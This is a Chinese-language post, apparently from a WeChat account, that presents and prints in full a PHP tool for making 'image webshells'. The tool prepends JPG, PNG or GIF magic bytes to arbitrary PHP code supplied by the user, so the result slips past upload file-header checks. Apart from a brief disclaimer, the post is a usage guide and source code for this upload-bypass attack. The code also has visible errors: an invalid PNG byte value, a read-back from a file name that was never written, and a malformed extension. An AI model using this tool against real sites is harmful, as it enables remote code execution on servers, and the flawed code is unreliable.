1免责声明

本公众号所发布的文章及工具代码等仅限交流学习，本公众号不承担任何责任！如有侵权，请告知我们立即删除。

2工具介绍

本脚本用于bypass文件头校验，支持jpg|png|gif格式文件。

3安装与使用

在环境的地址栏输入type参数，填入你想要的类型，再输入cmd参数，填入你想要的php代码，允许不输入cmd，默认采用phpinfo，以便探测图片马能否正常使用。type和cmd都可以用get/post方式传入。

例如：?type=jpg回显：创建成功！文件内容： ÿØ<?php phpinfo();?>

4源码文件

<!DOCTYPE html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=0.5, maximum-scale=2.0, user-scalable=yes" />
</head>
</html>
<?php
$cmd = '<?php phpinfo();?>';
// 读取输入的命令
if(!empty($_REQUEST['cmd'])){
    $cmd=$_REQUEST['cmd'];
}
// 输入产生文件的类型
function makeTrick($typeCode){
    switch($typeCode){
        case 'jpg':
            $fileType = Array(255,216);
            break;
        case 'png':
            $fileType = Array(137,800);
            break;
        case 'gif':
            $fileType = Array(71,73);
            break;
        default:
            $fileType = Null;
    }
    return $fileType;
}
function load($fileType,$cmd, $ext){
    // 读取输入的文件类型
    if(!empty($fileType)) {
        $data = pack('C2', $fileType[0], $fileType[1]);
        $file = fopen('profile'.$ext, "wb");
        // 写入文件头
        $bin = fwrite($file, $data);
        // 写入命令
        $bin2 = fwrite($file, $cmd);
        fclose($file);
        $file = fopen('profile'.$ext, "r");
        echo '创建成功！文件内容：</br>';
        echo htmlentities(fread($file, filesize('tmp_pack.txt')));
        fclose($file);
    }
}
if(!empty($_REQUEST['type'])) {
    $ext = $_REQUEST['type'];
    $fileType = makeTrick($ext);
    load($fileType, $cmd, $ext);
}else{
    echo '请用get方式输入type参数和cmd参数（可选，默认phpinfo）';
}